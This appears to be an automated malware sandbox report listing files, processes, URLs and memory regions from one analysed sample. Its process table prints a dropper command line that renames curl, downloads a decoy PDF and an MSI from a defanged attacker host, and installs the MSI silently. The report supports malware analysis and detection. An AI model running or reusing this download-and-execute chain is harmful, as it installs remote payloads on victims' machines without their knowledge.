Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
|
PE32 executable (console) Intel 80386, for MS Windows
|
dropped
|
||
\Device\ConDrv
|
ASCII text, with CR, LF line terminators
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\SysWOW64\cmd.exe
|
cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o
"C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf & "C:\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent
& C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c cd /d "C:\"
|
||
C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
|
TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf
|
||
C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
|
TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent
|
||
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn
|
||
C:\Windows\System32\msiexec.exe
|
C:\Windows\system32\msiexec.exe /V
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://curl.se/docs/hsts.html
|
unknown
|
||
https://curl.se/docs/copyright.htmlD
|
unknown
|
||
https://curl.se/libcurl/c/curl_easy_setopt.html
|
unknown
|
||
https://curl.se/P
|
unknown
|
||
https://curl.se/docs/http-cookies.html#
|
unknown
|
||
https://curl.se/docs/http-cookies.html
|
unknown
|
||
https://curl.se/docs/hsts.html#
|
unknown
|
||
https://curl.se/docs/sslcerts.html
|
unknown
|
||
https://curl.se/docs/sslcerts.htmlcurl
|
unknown
|
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
241.42.69.40.in-addr.arpa
|
unknown
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
E00000
|
unkown
|
page readonly
|
||
333D000
|
stack
|
page read and write
|
||
34B0000
|
heap
|
page read and write
|
||
E55000
|
unkown
|
page readonly
|
||
381F000
|
stack
|
page read and write
|
||
33A0000
|
heap
|
page read and write
|
||
34CA000
|
heap
|
page read and write
|
||
3460000
|
heap
|
page read and write
|
||
34C0000
|
heap
|
page read and write
|
||
E6F000
|
unkown
|
page read and write
|
||
E00000
|
unkown
|
page readonly
|
||
36EF000
|
stack
|
page read and write
|
||
382F000
|
stack
|
page read and write
|
||
346A000
|
heap
|
page read and write
|
||
E55000
|
unkown
|
page readonly
|
||
371E000
|
stack
|
page read and write
|
||
E01000
|
unkown
|
page execute read
|
||
33F0000
|
heap
|
page read and write
|
||
E00000
|
unkown
|
page readonly
|
||
3450000
|
heap
|
page read and write
|
||
E55000
|
unkown
|
page readonly
|
||
3910000
|
heap
|
page read and write
|
||
323D000
|
stack
|
page read and write
|
||
34CA000
|
heap
|
page read and write
|
||
E70000
|
unkown
|
page readonly
|
||
E00000
|
unkown
|
page readonly
|
||
3415000
|
heap
|
page read and write
|
||
E70000
|
unkown
|
page readonly
|
||
3390000
|
heap
|
page read and write
|
||
2FFD000
|
stack
|
page read and write
|
||
3360000
|
heap
|
page read and write
|
||
34C3000
|
heap
|
page read and write
|
||
3463000
|
heap
|
page read and write
|
||
E01000
|
unkown
|
page execute read
|
||
E01000
|
unkown
|
page execute read
|
||
3458000
|
heap
|
page read and write
|
||
34B8000
|
heap
|
page read and write
|
||
3420000
|
heap
|
page read and write
|
||
372E000
|
stack
|
page read and write
|
||
346A000
|
heap
|
page read and write
|
||
32FD000
|
stack
|
page read and write
|
||
33C5000
|
heap
|
page read and write
|
||
E01000
|
unkown
|
page execute read
|
||
3410000
|
heap
|
page read and write
|
||
33C0000
|
heap
|
page read and write
|
||
35EE000
|
stack
|
page read and write
|
||
E55000
|
unkown
|
page readonly
|
||
33AE000
|
stack
|
page read and write
|
||
3970000
|
heap
|
page read and write
|
||
33EE000
|
stack
|
page read and write
|
||
E70000
|
unkown
|
page readonly
|
||
E70000
|
unkown
|
page readonly
|
||
3380000
|
heap
|
page read and write
|
||
E6F000
|
unkown
|
page read and write
|
There are 44 hidden memdumps, click here to show them.